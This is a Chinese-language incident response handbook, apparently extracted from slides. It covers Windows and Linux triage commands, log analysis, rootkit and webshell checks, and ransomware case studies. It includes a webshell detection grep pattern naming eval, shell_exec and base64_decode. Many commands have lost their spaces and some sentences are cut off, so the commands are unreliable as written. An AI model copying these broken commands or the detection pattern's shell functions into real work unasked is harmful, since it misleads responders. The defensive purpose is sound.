2024信息安全應(yīng)急響應(yīng)手冊

信息安全應(yīng)急響應(yīng)手冊2024導(dǎo)致應(yīng)急事件原因大型企業(yè)的業(yè)務(wù)模式多，對外暴露的服務(wù)也多。由于對外暴露的服務(wù)多，導(dǎo)致被攻擊的面也會(huì)擴(kuò)大。黑產(chǎn)團(tuán)伙每天都會(huì)利用秒殺型漏洞批量掃描全網(wǎng)IP應(yīng)急響應(yīng)目的判斷這次應(yīng)急是否是被成功入侵的安全事件找到攻擊者入口點(diǎn)提取惡意樣本幫助客戶梳理攻擊者的攻擊路線，提供漏洞修復(fù)方案應(yīng)急響應(yīng)技能棧1、Windows常用命令與分析工具2、Linux常用命令與日志分析3、常規(guī)安全事件的處置Windows基礎(chǔ)1、文件排查2、進(jìn)程排查3、系統(tǒng)信息排查4、工具排查5、日志排查文件排查開機(jī)啟動(dòng)有無異常文件【開始】?【運(yùn)行】?【msconfig】文件排查敏感的文件路徑%WINDIR%%WINDIR%\system32\%TEMP%文件排查各個(gè)盤下的temp(tmp)相關(guān)目錄下查看有無異常文件：Windows產(chǎn)生的臨時(shí)文件文件排查Recent是系統(tǒng)文件夾，里面存放著你最近使用的文檔的快捷方式，查看用戶recent相關(guān)文件，通過分析最近打開分析可疑文件：【開始】?【運(yùn)行】?【%UserProfile%\Recent】文件排查根據(jù)文件夾內(nèi)文件列表時(shí)間進(jìn)行排序，查找可疑文件。當(dāng)然也可以搜索指定日期范圍的文件及文件文件排查查看文件時(shí)間，創(chuàng)建時(shí)間、修改時(shí)間、訪問時(shí)間，黑客通過菜刀類工具改變的是修改時(shí)間。所以如果修改時(shí)間在創(chuàng)建時(shí)間之前明顯是可疑文件進(jìn)程排查netstat-ano查看目前的網(wǎng)絡(luò)連接，定位可疑的ESTABLISHEDnetstat 參數(shù)說明：-a 顯示所有網(wǎng)絡(luò)連接、路由表和網(wǎng)絡(luò)接口信息-n 以數(shù)字形式顯示地址和端口號(hào)-o ID-r 顯示路由表-s 顯示按協(xié)議統(tǒng)計(jì)信息、默認(rèn)地、顯示IP進(jìn)程排查常見的狀態(tài)說明：LISTENING 偵聽狀態(tài)建立連對方主動(dòng)關(guān)閉連接或網(wǎng)絡(luò)異常導(dǎo)致連接中斷ESTABLISHED:指TCP連接已建立，雙方可以進(jìn)行方向數(shù)據(jù)傳遞CLOSE_WAIT:這種狀態(tài)的含義其實(shí)是表示在等待關(guān)閉。當(dāng)對方close一個(gè)SOCKET后發(fā)送FIN報(bào)文給自己，系統(tǒng)會(huì)回應(yīng)一個(gè)ACK報(bào)文給對方，此時(shí)則進(jìn)入到CLOSE_WAIT狀態(tài)。接下來，實(shí)際上你真正需要考慮的事情是察看你是否還有數(shù)據(jù)發(fā)送給對方，如果沒有的話，那么你也就可以close這個(gè)SOCKET，發(fā)送FIN報(bào)文給對方，也即關(guān)閉連接。所以你在CLOSE_WAIT狀態(tài)下，需要完成的事情是等待你去關(guān)閉連接。LISTENING:指TCP正在監(jiān)聽端口，可以接受鏈接TIME_WAIT:指連接已準(zhǔn)備關(guān)閉。表示收到了對方的FIN報(bào)文，并發(fā)送出了ACK報(bào)文，就等2MSL后即可回到CLOSED可用狀態(tài)了。如果FIN_WAIT_1狀態(tài)下，收到了對方同時(shí)帶FIN標(biāo)志和ACK標(biāo)志的報(bào)文時(shí)，可以直接進(jìn)入到TIME_WAIT狀態(tài)，而無須經(jīng)過FIN_WAIT_2狀態(tài)。FIN_WAIT_1:這個(gè)狀態(tài)要好好解釋一下，其實(shí)FIN_WAIT_1和FIN_WAIT_2狀態(tài)的真正含義都是表示等待對方的FIN報(bào)文。而這兩種狀態(tài)的區(qū)別是：FIN_WAIT_1狀態(tài)實(shí)際上是當(dāng)SOCKET在ESTABLISHED狀態(tài)時(shí)，它想主動(dòng)關(guān)閉連接，向?qū)Ψ桨l(fā)送了FIN報(bào)文，此時(shí)該SOCKET即進(jìn)入到FIN_WAIT_1狀態(tài)。而當(dāng)對方回應(yīng)ACK報(bào)文后，則進(jìn)入到FIN_WAIT_2狀態(tài)，當(dāng)然在實(shí)際的正常情況下，無論對方何種情況下，都應(yīng)該馬上回應(yīng)ACK報(bào)文，所以FIN_WAIT_1狀態(tài)一般是比較難見到的，而FIN_WAIT_2狀態(tài)還有時(shí)常?？梢杂胣etstat看到。FIN_WAIT_2：上面已經(jīng)詳細(xì)解釋了這種狀態(tài)，實(shí)際上FIN_WAIT_2狀態(tài)下的SOCKET，表示半連接，也即有一方要求close連接，但另外還告訴對方，我暫時(shí)還有點(diǎn)數(shù)據(jù)需要傳送給你，稍后再關(guān)閉連接。LAST_ACK:是被動(dòng)關(guān)閉一方在發(fā)送FIN報(bào)文后，最后等待對方的ACK報(bào)文。當(dāng)收到ACK報(bào)文后，也即可以進(jìn)入到CLOSED可用狀態(tài)了SYNC_RECEIVED:收到對方的連接建立請求,這個(gè)狀態(tài)表示接受到了SYN報(bào)文，在正常情況下，這個(gè)狀態(tài)是服務(wù)器端的SOCKET在建立TCP連接時(shí)的三次握手會(huì)話過程中的一個(gè)中間狀態(tài)，很短暫，基本上用netstat你是很難看到這種狀態(tài)的，除非你特意寫了一個(gè)客戶端測試程序，故意將三次TCP握手過程中最后一個(gè)ACK報(bào)文不予發(fā)送。因此這種狀態(tài)時(shí)，當(dāng)收到客戶端的ACK報(bào)文后，它會(huì)進(jìn)入到ESTABLISHED狀態(tài)。SYNC_SEND:已經(jīng)主動(dòng)發(fā)出連接建立請求。與SYN_RCVD遙想呼應(yīng)，當(dāng)客戶端SOCKET執(zhí)行CONNECT連接時(shí)，它首先發(fā)送SYN報(bào)文，因此也隨即它會(huì)進(jìn)入到了SYN_SENT狀態(tài)，并等待服務(wù)端的發(fā)送三次握手中的第2個(gè)報(bào)文。netstat-b顯示在創(chuàng)建每個(gè)連接或偵聽端口時(shí)涉及的可執(zhí)行程序，需要管理員權(quán)限，這條指令對于查找可疑程序非常有幫助。進(jìn)程排查根據(jù)netstat定位出的pid，再通過tasklist命令進(jìn)行進(jìn)程定位tasklist顯示運(yùn)行在本地或遠(yuǎn)程計(jì)算機(jī)上的所有進(jìn)程；進(jìn)程排查根據(jù)wmicprocess獲取進(jìn)程的全路徑進(jìn)程排查任務(wù)管理器定位到進(jìn)程路徑進(jìn)程排查 查詢進(jìn)程wmicprocess（帶有cmdline）wmicprocesslistbriefwmicprocesswherename=“xxxx”getexecutablepath刪除進(jìn)程wmicprocesswhereprocessid="2345"delete進(jìn)程排查* 查詢服務(wù)wmicSERVICE（涵蓋服務(wù)關(guān)聯(lián)所有信息）wmicSERVICEwherecaption(name)=”xxxxxx”callstopservicewmicSERVICEwherecaption(name)=“xxxxxx"calldelete進(jìn)程排查* 啟動(dòng)項(xiàng)枚舉wmicstartuplistfull計(jì)劃任務(wù)枚舉schtasks/query/fotable/v（執(zhí)行前先執(zhí)行chcp437）進(jìn)程排查

很多種類的病毒都依賴網(wǎng)絡(luò)進(jìn)行傳播和復(fù)制，并感染局域網(wǎng)中的大量終端?？梢酝ㄟ^開放端口進(jìn)行分析，有助于病毒對象的確認(rèn)；下面提供一些常用的病毒使用的端口信息，可以作為參考；系統(tǒng)信息排查查看環(huán)境變量的設(shè)置【我的電腦】?【屬性】?【高級系統(tǒng)設(shè)置】?【高級】?【環(huán)境變量】系統(tǒng)信息排查Windows計(jì)劃任務(wù)【程序】?【附件】?【系統(tǒng)工具】?【任務(wù)計(jì)劃程序】系統(tǒng)信息排查Windows帳號(hào)信息，如隱藏帳號(hào)等【開始】?【運(yùn)行】?【compmgmt.msc】?【本地用戶和組】?【用戶】(用戶名以$結(jié)尾的為隱藏用戶，如：admin$)系統(tǒng)信息排查命令行方式：netuser，可直接收集用戶信息（此方法看不到隱藏用戶），若需查看某個(gè)用戶的詳細(xì)信息，可使用命令?netuserusername；系統(tǒng)信息排查查看當(dāng)前系統(tǒng)用戶的會(huì)話使用?queryuser查看當(dāng)前系統(tǒng)的會(huì)話，比如查看是否有人使用遠(yuǎn)程終端登錄服務(wù)器；系統(tǒng)信息排查logoff踢出該用戶；系統(tǒng)信息排查查看systeminfo信息，系統(tǒng)版本以及補(bǔ)丁信息系統(tǒng)信息排查Github源碼：/neargle/win-powerup-exp-index工具排查MicrosoftNetworkMonitor一款輕量級網(wǎng)絡(luò)協(xié)議數(shù)據(jù)分析工具；工具排查PCHunter下載地址：\h/工具排查PCHunter黑色：微軟簽名的驅(qū)動(dòng)程序；藍(lán)色：非微軟簽名的驅(qū)動(dòng)程序；紅色：驅(qū)動(dòng)檢測到的可疑對象，隱藏服務(wù)、進(jìn)程、被掛鉤函數(shù)；工具排查ProcessExplorerWindows系統(tǒng)和應(yīng)用程序監(jiān)視工具;

(1)映像]->[路徑/命令行/工作目錄/自啟動(dòng)位置/進(jìn)程/用戶/啟動(dòng)時(shí)間]；[TCP/IP];[安全]->[權(quán)限]；(3).想了解不同顏色意思？[選項(xiàng)]->[配置顏色]；工具排查Procexp是常用的進(jìn)程查看工具打開procexp，在標(biāo)題欄右鍵，可以勾選其它一些選項(xiàng)卡工具排查綠色，結(jié)束時(shí)為紅色可對某個(gè)進(jìn)程進(jìn)行操作，右鍵單擊即可。工具排查Scylla_x86/x64是一款常用的PE工具，用來修復(fù)PE的IAT表及內(nèi)存轉(zhuǎn)儲(chǔ)。下載地址/Tools/PEtools/Scylla.v.0.9.8.rar在附加進(jìn)程欄選擇要附加的進(jìn)程選擇好后，找到頁面的dump按鈕（中文版為轉(zhuǎn)儲(chǔ)到文件），存dump到本地日志排查Windows登錄日志排查日志排查主要分析安全日志，可以借助自帶的篩選功能日志排查主要分析安全日志，可以借助自帶的篩選功能日志排查可以把日志導(dǎo)出為文本格式，然后使用notepad++打開，使用正則模式去匹配遠(yuǎn)程登錄過的IP地址，在界定事件日期范圍的基礎(chǔ)。正則：((?:(?:25[0-5]|2[0-4]\d|((1\d{2})|([1-9]?\d))).){3}(?:25[0-5]|2[0-4]\d|((1\d{2})|([1-9]?\d))))日志排查中間件日志(Web日志access_log)nginx、apacheiistomcat、jboss、weblogic、websphereLinux基礎(chǔ)1、文件排查2、進(jìn)程排查3、日志排查4、系統(tǒng)信息排查5、后門排查文件排查敏感目錄的文件分析[類/tmp目錄，命令目錄/usr/bin/usr/sbin等]ls 用來顯示目標(biāo)列表-a 顯示所有檔案及目錄（ls，不會(huì)列出）；-C 多列顯示輸出結(jié)果。這是默認(rèn)選項(xiàng)；-l以長格式顯示目錄下的內(nèi)容列表。輸出的信息從左到右依次包括文件名，文件類型、權(quán)限模式、硬連接數(shù)、所有者、組、文件大小和文件的最后修改時(shí)間等；-t用文件和目錄的更改時(shí)間排序；文件排查查看tmp目錄下的文件???ls–alt/tmp/文件排查如圖，發(fā)現(xiàn)多個(gè)異常文件，疑似挖礦程序病毒：文件排查文件排查查看開機(jī)啟動(dòng)項(xiàng)內(nèi)容???ls-alt/etc/init.d/，/etc/init.d是/etc/rc.d/init.d的軟鏈接文件排查安時(shí)間排序查看指定目錄下文件???ls-alt|head-n10文件排查針對可疑文件可以使用stat進(jìn)行創(chuàng)建修改時(shí)間、訪問時(shí)間的詳細(xì)查看，若修改時(shí)間距離事件日期接近，有線性關(guān)聯(lián)，說明可能被篡改或者其他。文件排查查看歷史命令記錄文件~/.bash_history。文件排查查看操作系統(tǒng)用戶信息文件/etc/passwd文件排查查看新增文件find：在指定目錄下查找文件-typeb/d/c/p/l/f查是塊設(shè)備、目錄、字符設(shè)備、管道、符號(hào)、鏈接、普通文件-mtimenn 按文件更改時(shí)間來查找文件，-n指n天以內(nèi)，+n指n天前-atimenn 按文件訪問時(shí)間來查找文件，-n指n天以內(nèi)，+n指天前-ctimenn 按文件創(chuàng)建時(shí)間來查找文件，-n指n天以內(nèi)，+n指天前文件排查特殊權(quán)限的文件查看查找777的權(quán)限的文件???find.-name*.jsp-perm777文件排查隱藏的文件（以"."開頭的具有隱藏屬性的文件）文件排查查看分析任務(wù)計(jì)劃crontab-u<-l,-r,-e>-u指定一個(gè)用戶-l列出某個(gè)用戶的任務(wù)計(jì)劃-r刪除某個(gè)用戶的任務(wù)-e編輯某個(gè)用戶的任務(wù)（編輯的是/var/spool/cron下對應(yīng)用戶的cron文件，也可以直接修改/etc/crontab文件）文件排查通過crontab–l查看當(dāng)前的任務(wù)計(jì)劃有哪些，是否有后門木馬程序啟動(dòng)相關(guān)信息；查看etc目錄任務(wù)計(jì)劃相關(guān)文件，ls/etc/cron*進(jìn)程排查用netstat網(wǎng)絡(luò)連接命令，分析可疑端口、可疑IP、可疑PID及程序進(jìn)程netstat–antlp|more進(jìn)程排查可查看到本地mysql數(shù)據(jù)庫有外部連接行為進(jìn)程排查根據(jù)netstat定位出的pid，使用ps命令，分析進(jìn)程psaux|greppid進(jìn)程排查將netstat與ps結(jié)合日志排查/etc/syslog或/etc/syslogd或/etc/rsyslog.d/etc/syslog.conf或rsyslog.conf日志排查*日志類型下面是和應(yīng)急相關(guān)的常見日志類型，但并不是所有的Linux發(fā)行版都包含這些類型：類型說明auth用戶認(rèn)證時(shí)產(chǎn)生的日志，如login命令、su命令。authpriv與auth類似，但是只能被特定用戶查看。console針對系統(tǒng)控制臺(tái)的消息。cron系統(tǒng)定期執(zhí)行計(jì)劃任務(wù)時(shí)產(chǎn)生的日志。daemon某些守護(hù)進(jìn)程產(chǎn)生的日志。ftpFTP服務(wù)。kern系統(tǒng)內(nèi)核消息。mail郵件日志。mark產(chǎn)生時(shí)間戳。系統(tǒng)每隔一段時(shí)間向日志文件中輸出當(dāng)前時(shí)間，每行的格式類似于May2611:17:09rs2--MARK--，可以由此推斷系統(tǒng)發(fā)生故障的大概時(shí)間。news網(wǎng)絡(luò)新聞傳輸協(xié)議(nntp)產(chǎn)生的消息。ntp網(wǎng)絡(luò)時(shí)間協(xié)議(ntp)產(chǎn)生的消息。user用戶進(jìn)程。日志排查*日志優(yōu)先級優(yōu)先級說明emerg緊急情況，系統(tǒng)不可用（例如系統(tǒng)崩潰），一般會(huì)通知所有用戶。alert需要立即修復(fù)，例如系統(tǒng)數(shù)據(jù)庫損壞。crit危險(xiǎn)情況，例如硬盤錯(cuò)誤，可能會(huì)阻礙程序的部分功能。err一般錯(cuò)誤消息。warning警告。notice不是錯(cuò)誤，但是可能需要處理。info通用性消息，一般用來提供有用信息。debug調(diào)試程序產(chǎn)生的信息。none沒有優(yōu)先級，不記錄任何日志消息。日志排查*日志目錄作用日志目錄作用/var/log/message包括整體系統(tǒng)信息/var/log/auth.log包含系統(tǒng)授權(quán)信息，包括用戶登錄和使用的權(quán)限機(jī)制等/var/log/userlog記錄所有等級用戶信息的日志/var/log/cron記錄crontab命令是否被正確的執(zhí)行/var/log/vsftpd.log記錄LinuxFTP日志/var/log/lastlog記錄登錄的用戶，可以使用命令lastlog查看/var/log/secure記錄大多數(shù)應(yīng)用輸入的賬號(hào)與密碼，登錄成功與否var/log/wtmp記錄登錄系統(tǒng)成功的賬戶信息，等同于命令lastvar/log/faillog記錄登錄系統(tǒng)不成功的賬號(hào)信息，一般會(huì)被黑客刪除日志排查日志配置linux系統(tǒng)日志相關(guān)配置文件為/etc/rsyslog.conf（syslog.conf），以下是對配置文件各項(xiàng)配置；日志排查日志分析日志查看分析，主要為grep,sed,sort,awk的綜合運(yùn)用；日志排查/var/log/wtmp日志排查/var/run/utmp日志排查/var/log/lastlog(lastlog)日志排查/var/log/btmp(lastb)日志排查/var/log/secure日志排查定位有多少IP在爆破主機(jī)的root帳號(hào)：grep"Failedpasswordforroot"/var/log/secure|awk'{print$11}'|sort|uniq-c|sort-nr|more日志排查登錄成功的IP有哪些：grep"Accepted"/var/log/secure|awk'{print$11}'|sort|uniq-c|sort-nr|more日志排查Apache日志字段說明：字段說明遠(yuǎn)程主機(jī)IP表明是誰訪問了網(wǎng)站空白(E-mail)為了避免用戶的郵箱被垃圾郵件騷擾，第二項(xiàng)就用“-”取代了空白(登錄名)用于記錄瀏覽者進(jìn)行身份驗(yàn)證時(shí)提供的名字請求時(shí)間用方括號(hào)包圍，而且采用“公用日志格式”或者“標(biāo)準(zhǔn)英文格式”。時(shí)間信息最后的“+0800”表示服務(wù)器所處時(shí)區(qū)位于UTC之后的8小時(shí)方法資源協(xié)議請求的方式：METHOD、GET、POST、HEAD等請求的文件請求的協(xié)議：HTTP+版本號(hào)狀態(tài)碼請求的狀態(tài)碼發(fā)送的字節(jié)數(shù)表示發(fā)送給客戶端的總字節(jié)數(shù)。它告訴我們傳輸是否被打斷（該數(shù)值是否和文件的大小相同）Referer從哪個(gè)頁面鏈接過來的User-Agent客戶使用的操作系統(tǒng)及版本、CPU類型、瀏覽器及版本、瀏覽器渲染引擎、瀏覽器語言、瀏覽器插件等信息日志排查*Apache默認(rèn)自動(dòng)生成兩個(gè)日志文件，訪問日志access_log和error_log；日志排查日志排查查詢訪問量前十的IP地址：日志排查查詢訪問量前十的URL：日志排查統(tǒng)計(jì)訪問量前十QPS的時(shí)間點(diǎn)：日志排查在對WEB日志進(jìn)行安全分析時(shí)，可以按照兩種思路展開，逐步深入，還原整個(gè)攻擊過程；日志排查首先確定受到攻擊、入侵的時(shí)間范圍，以此為線索，查找這個(gè)時(shí)間范圍內(nèi)可疑的日志，進(jìn)一步排查，最終確定攻擊者，還原攻擊過程；日志排查一般攻擊者在入侵網(wǎng)站后，通常會(huì)上傳一個(gè)后門文件，以方便自己以后訪問。我們也可以以該文件為線索來展開分析；日志排查數(shù)據(jù)庫日志日志排查查看數(shù)據(jù)庫文件：路徑為/var/log/mysql/，記錄一次數(shù)據(jù)庫的連接、查詢和退出中間的數(shù)據(jù)庫操作；日志排查catmysql.log|grepunion系統(tǒng)信息排查查看分析history(cat/root/.bash_history)，曾經(jīng)的命令操作痕跡，以便進(jìn)一步排查溯源。運(yùn)氣好有可能通過記錄關(guān)聯(lián)到如下信息：wget遠(yuǎn)程某主機(jī)（域名&IP）的遠(yuǎn)控文件；嘗試連接內(nèi)網(wǎng)某主機(jī)（sshscp），便于分析攻擊者意圖;打包某敏感數(shù)據(jù)或代碼，tarzip類命令對系統(tǒng)進(jìn)行配置，包括命令修改、遠(yuǎn)控木馬類，可找到攻擊者關(guān)聯(lián)信息…系統(tǒng)信息排查查看分析用戶相關(guān)分析系統(tǒng)信息排查查看分析任務(wù)計(jì)劃crontab-u<-l,-r,-e>系統(tǒng)信息排查查看linux開機(jī)啟動(dòng)程序查看rc.local文件（/etc/init.d/rc.local/etc/rc.local）ls–alt/etc/init.d/系統(tǒng)信息排查查看系統(tǒng)用戶登錄信息使用lastlog命令，系統(tǒng)中所有用戶最近一次登錄信息系統(tǒng)信息排查使用lastb命令，用于顯示用戶錯(cuò)誤的登錄列表；使用last命令，用于顯示用戶最近登錄信息（數(shù)據(jù)源為/var/log/wtmp，var/log/btmp）；系統(tǒng)信息排查utmp文件中保存的是當(dāng)前正在本系統(tǒng)中的用戶的信息。wtmp文件中保存的是登錄過本系統(tǒng)的用戶的信息。/var/log/wtmp文件結(jié)構(gòu)和/var/run/utmp文件結(jié)構(gòu)一樣，都是引用/usr/include/bits/utmp.h中的structutmp；系統(tǒng)信息排查系統(tǒng)路徑分析echo$PATH分析有無敏感可疑信息系統(tǒng)信息排查指定信息檢索strings命令在對象文件或二進(jìn)制文件中查找可打印的字符串；分析sshd文件，是否包括IP信息strings/usr/bin/.sshd|grep'[1-9]{1,3}.[1-9]{1,3}.'系統(tǒng)信息排查查看ssh相關(guān)目錄有無可疑的公鑰存在Redis（6379）未授權(quán)惡意入侵，即可直接通過redis到目標(biāo)主機(jī)導(dǎo)入公鑰目錄：/etc/ssh./.ssh/后門排查chkrootkit主要功能：檢測是否被植入后門、木馬、rootkit檢測系統(tǒng)命令是否正常檢測登錄日志后門排查chkrootkit安裝：rpm-ivhchkrootkit-0.47-1.i386.rpm檢測#chkrootkit–n；如果發(fā)現(xiàn)有異常，會(huì)報(bào)出“INFECTED”字樣。后門排查定時(shí)檢測自帶的腳本并沒有包括定時(shí)檢測部分，而考慮到該工具的作用crontab中：cp-p./chkrootkit.sh/etc/cron.daily/后門排查rkhunter主要功能：系統(tǒng)命令（Binary）檢測，包括Md5校驗(yàn)Rootkit檢測本機(jī)敏感目錄、系統(tǒng)配置、服務(wù)及套間異常檢測三方應(yīng)用版本檢測后門排查RPMcheck檢查./rpm-Va>rpm.log下圖可知ps,pstree,netstat,sshd等等系統(tǒng)關(guān)鍵進(jìn)程被篡改了：后門排查Webshell檢查的命名特征和內(nèi)容特征，相對操作性較高，在入侵后應(yīng)急過程中頻率也比較高。a）Webshell的排查可以通過可根據(jù)webshell特征進(jìn)行命令查找，簡單的可使用(當(dāng)然會(huì)存在漏報(bào)和誤報(bào))a）Webshell的排查可以通過可根據(jù)webshell特征進(jìn)行命令查找，簡單的可使用(當(dāng)然會(huì)存在漏報(bào)和誤報(bào))find/var/www/-name"*.php"|xargsegrep'assert|phpspy|c99sh|milw0rm|eval|\(gunerpress|\(base64_decoolcode|spider_bc|shell_exec|passthru|\(\$\_\POST\[|eval\(str_rot13|\.chr\(|\$\{\"\_P|eval\(\$\_R|file_put_contents\(\.\*\$\_|base64_decode’b）Github上存在各種版本的webshell查殺腳本，各有各的自己的特點(diǎn)，可使用河馬shell查殺（）后門排查手工Webshell排查find/var/www/html/-typef-name'*.php'|xargsgrep'eval'|more后門排查通過chkrootkit、rkhunter、RPMcheck、WebshellCheck等手段得出以下應(yīng)對措施：根據(jù)進(jìn)程、連接等信息關(guān)聯(lián)的程序，查看木馬活動(dòng)信息。假如系統(tǒng)的命令（例如netstatls）下載一新的或者從其他未感染的主機(jī)拷貝新的命令。發(fā)現(xiàn)可疑可執(zhí)行的木馬文件，不要急于刪除，先打包備份一份。IP地址、加密方式、關(guān)鍵字（以便擴(kuò)大整個(gè)目錄的文件特征提?。┑?。常見應(yīng)急事件目前根據(jù)主機(jī)受到的攻擊的表象可將木馬病毒分為四類：勒索病毒、挖礦木馬、遠(yuǎn)控木馬和普通木馬。勒索病毒特征即磁盤文件被加密，一旦完成勒索過程則無法恢復(fù)文件，因此這類病毒以預(yù)防為主，安裝殺毒軟件并做好主機(jī)防黑工作及時(shí)打補(bǔ)丁，對重要文件要及時(shí)隔離備份；挖礦木馬特征即CPU和GPU異常占用過高，且有對礦池地址的解析。目前挖礦木馬表現(xiàn)可有落地文件實(shí)現(xiàn)也可通過WMI等無落地文件實(shí)現(xiàn)；遠(yuǎn)控木馬一直是apt攻擊的主流，復(fù)雜程度高，其特點(diǎn)是集成了攻擊模塊、控制模塊、持久化模塊等且有C2服務(wù)器；普通木馬代指除開以上類型的其余木馬類型等勒索病毒處置流程處置流程 另外，在碰到這類問題如何處置的時(shí)候，存在較大問題，正確的步驟應(yīng)該是：1）通過各類檢查設(shè)備和資產(chǎn)發(fā)現(xiàn)，確定感染面；通過網(wǎng)絡(luò)訪問控制設(shè)備或斷網(wǎng)隔離感染區(qū)域，避免病毒擴(kuò)散；迅速啟動(dòng)殺毒或備份恢復(fù)措施，恢復(fù)受感染主機(jī)的業(yè)務(wù)，恢復(fù)生產(chǎn)。（務(wù)的關(guān)鍵動(dòng)作）啟動(dòng)或部署監(jiān)測設(shè)備，針對病毒感染進(jìn)行全面監(jiān)測，避免死灰復(fù)燃。并制定整改計(jì)劃。所有應(yīng)急響應(yīng)中最重要的也是優(yōu)先級最高的就是止損，而不是溯源或是技術(shù)分析等。了解現(xiàn)狀工程師到現(xiàn)場第一時(shí)間了解目前什么情況：文件被加密？設(shè)備無法正常啟動(dòng)？勒索信息展示？桌面有新的文本文件并記錄加密信息及解密聯(lián)系方式？了解發(fā)病時(shí)間文件加密時(shí)間？設(shè)備無法正常啟動(dòng)的時(shí)間？新的文本文件的出現(xiàn)時(shí)間？了解事件發(fā)生時(shí)間，后面以此時(shí)間點(diǎn)做排查重點(diǎn)；了解系統(tǒng)架構(gòu)系統(tǒng)名稱IP地址端口開放物理機(jī)/虛擬機(jī)主機(jī)名設(shè)備型號(hào)操作系統(tǒng)類型BIDW（數(shù)據(jù)庫）節(jié)點(diǎn)0110.2xx.xx.xx80、22物理機(jī)BnnnnIBMP595AIX操作系統(tǒng)版本管理后臺(tái)IP地址中間件類型中間件版本數(shù)據(jù)庫類型數(shù)據(jù)庫版本應(yīng)用URLAIX5.310.xx.xxx.79was7oracleV11應(yīng)用端口儲(chǔ)存設(shè)備類型儲(chǔ)存設(shè)備型號(hào)web框架中間件版本第三方組件80磁帶庫3584/L52struts2.4編輯器確認(rèn)感染者操作系統(tǒng)版本管理后臺(tái)IP地址中間件類型中間件版本數(shù)據(jù)庫類型數(shù)據(jù)庫版本應(yīng)用URLAIX5.310.xx.xxx.79was7oracleV11應(yīng)用端口儲(chǔ)存設(shè)備類型儲(chǔ)存設(shè)備型號(hào)web框架中間件版本第三方組件80磁帶庫3584/L52struts2.4編輯器感染文件特征和感染時(shí)間1、操作系統(tǒng)桌面是否有新的文本文件,文本文件中是否有詳細(xì)的加密信息及解密聯(lián)系方式；2、被加密的文件類型；3、加密后的文件后綴；被加密的文件類型.der,.pfx,.key,.crt,.csr,.p12,.pem,.odt,.ott,.sxw,.stw,.uot,.3ds,.max,.3dm,.ods,.ots,.sxc,.stc,.dif,.slk,.wb2,.odp,.otp,.sxd,.std,.uop,.odg,.otg,.sxm,.mml,.lay,.lay6,.asc,.sqlite3,.sqlitedb,.sql,.accdb,.mdb,.dbf,.odb,.frm,.myd,.myi,.ibd,.mdf,.ldf,.sln,.suo,.cpp,.pas,.asm,.cmd,.bat,.ps1,.vbs,.dip,.dch,.sch,.brd,.jsp,.php,.asp,.java,.jar,.class,.mp3,.wav,.swf,.fla,.wmv,.mpg,.vob,.mpeg,.asf,.avi,.mov,.mp4,.3gp,.mkv,.3g2,.flv,.wma,.mid,.m3u,.m4u,.djvu,.svg,.psd,.nef,.tiff,.tif,.cgm,.raw,.gif,.png,.bmp,.jpg,.jpeg,.vcd,.iso,.backup,.zip,.rar,.tgz,.tar,.bak,.tbk,.bz2,.PAQ,.ARC,.aes,.gpg,.vmx,.vmdk,.vdi,.sldm,.sldx,.sti,.sxi,.602,.hwp,.snt,.onetoc2,.dwg,.pdf,.wk1,.wks,.123,.rtf,.csv,.txt,.vsdx,.vsd,.edb,.eml,.msg,.ost,.pst,.potm,.potx,.ppam,.ppsx,.ppsm,.pps,.pot,.pptm,.pptx,.ppt,.xltm,.xltx,.xlc,.xlm,.xlt,.xlw,.xlsb,.xlsm,.xlsx,.xls,.dotx,.dotm,.dot,.docm,.docb,.docx,.doc加密后的文件后綴.WNCRYT，.lock，.pre_alpha，.aes，.aes_ni，.xdata，.aes_ni_0day，.pr0tect，.[\hstopstorage@].java，文件后綴無變化；確認(rèn)感染時(shí)間Linux系統(tǒng)：執(zhí)行命令stat[空格]文件名，包括三個(gè)時(shí)間accesstime（訪問時(shí)間）、modifytime（內(nèi)容修改時(shí)間）、changetime（屬性改變時(shí)間），如：例：stat/etc/passwdWindows系統(tǒng)：例：右鍵查看文件屬性，查看文件時(shí)間處理方式未被感染主機(jī)：關(guān)閉SSH、RDP等協(xié)議，并且更改主機(jī)密碼；禁止接入U(xiǎn)盤、移動(dòng)硬盤等可執(zhí)行擺渡攻擊的設(shè)備；處理方式被感染主機(jī)：立即對被感染主機(jī)進(jìn)行隔離處置，禁用所有有線及無線網(wǎng)卡或直接拔掉網(wǎng)線，防止病毒感染其他主機(jī)；禁止在被感染主機(jī)上使用U盤、移動(dòng)硬盤等可執(zhí)行擺渡攻擊的設(shè)備；處理方式無法定位到文件？木馬執(zhí)行完畢后自刪除采用傀儡進(jìn)程技術(shù)，惡意代碼只在內(nèi)存展開執(zhí)行高級或Bootkit級木馬，強(qiáng)對抗性，三環(huán)工具無法探測解決方式收集系統(tǒng)事件日志，保持系統(tǒng)環(huán)境，請求后端技術(shù)支持案例一事件概述接到某局客戶應(yīng)急響應(yīng)請求：某外網(wǎng)服務(wù)器中敲詐者病毒。案例一事件分析響應(yīng)人員到場了解情況后，發(fā)現(xiàn)服務(wù)器中植入勒索病毒，導(dǎo)致全盤文件被加密為java后綴格式文件，所有應(yīng)用均無法使用。發(fā)現(xiàn)系統(tǒng)所有文件被加密為java后綴文件；案例一桌面存在敲詐文件“FILESENCRYPTED.txt”,內(nèi)容為敲詐者的勒索信息，疑似攻擊者郵箱為：\hstopstorage@；案例一該email地址已有多起攻擊事件：案例一查看系統(tǒng)進(jìn)程，發(fā)現(xiàn)360天擎的相關(guān)防護(hù)服務(wù)已被關(guān)閉；案例一進(jìn)一步排查，發(fā)現(xiàn)服務(wù)器對外開放了3389遠(yuǎn)程桌面管理端口；案例一administrator賬戶口令為弱口令，且自系統(tǒng)安裝以來未修改過密碼：案例一結(jié)論：向客戶說明服務(wù)器中“敲詐者”病毒，磁盤文件被全盤加密，目前暫時(shí)無法解密，只能通過重裝操作系統(tǒng)來恢復(fù)，事件原因是黑客通過服務(wù)器3389端口弱口令進(jìn)入，并上傳加密程序執(zhí)行加密；案例二事件概述接到客戶應(yīng)急響應(yīng)請求，xx供應(yīng)鏈Web應(yīng)用服務(wù)器和數(shù)據(jù)庫服務(wù)器在遷移前后多次被勒索軟件感染加密。案例二事件分析應(yīng)急響應(yīng)小組成員在通過登錄被加密感染的數(shù)據(jù)庫服務(wù)器，發(fā)現(xiàn)其桌面上彈出勒索軟件提示窗口：案例二通過對被加密文件進(jìn)行索引，發(fā)現(xiàn)加密的開始時(shí)間為2017年12月17日20點(diǎn)09分13秒；案例二通過對系統(tǒng)日志進(jìn)行分析，發(fā)現(xiàn)大量的遠(yuǎn)程桌面服務(wù)爆破日志：案例二同時(shí)，于2017年12月17日凌晨00點(diǎn)09分26秒，IP歸屬于荷蘭的攻擊者成功登錄該系統(tǒng)